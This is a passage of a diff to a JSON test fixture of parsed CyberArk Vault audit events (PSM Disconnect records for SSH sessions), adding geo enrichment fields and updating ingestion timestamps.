System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1234,17 +1360,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1324,7 +1468,7 @@ "event": { "severity": 2, "duration": 2230000000000, - "ingested": "2021-12-09T13:36:49.813828200Z", + "ingested": "2021-12-14T14:42:15.678833964Z", "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1348,17 +1492,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1434,7 +1596,7 @@ "event": { "severity": 2, "duration": 5000000000, - "ingested": "2021-12-09T13:36:49.813833500Z", + "ingested": "2021-12-14T14:42:15.678834463Z", "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1458,17 +1620,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1544,7 +1724,7 @@ "event": { "severity": 2, "duration": 6000000000, - "ingested": "2021-12-09T13:36:49.813838800Z", + "ingested": "2021-12-14T14:42:15.678834901Z", "original": "\u003c5\u003e1 2021-03-15T14:08:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:11\",\"IsoTimestamp\":\"2021-03-15T14:08:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1568,17 +1748,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1663,7 +1861,7 @@ "event": { "severity": 2, "duration": 9000000000, - "ingested": "2021-12-09T13:36:49.813844200Z", + "ingested": "2021-12-14T14:42:15.678835289Z", "original": "\u003c5\u003e1 2021-03-15T14:08:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:36\",\"IsoTimestamp\":\"2021-03-15T14:08:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "302", "kind": "event", @@ -1687,17 +1885,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1782,7 +1998,7 @@ "event": { "severity": 2, "duration": 2952000000000, - "ingested": "2021-12-09T13:36:49.813849500Z", + "ingested": "2021-12-14T14:42:15.678835667Z", "original": "\u003c5\u003e1 2021-03-15T15:00:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:00:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:00:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:00:21\",\"IsoTimestamp\":\"2021-03-15T15:00:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 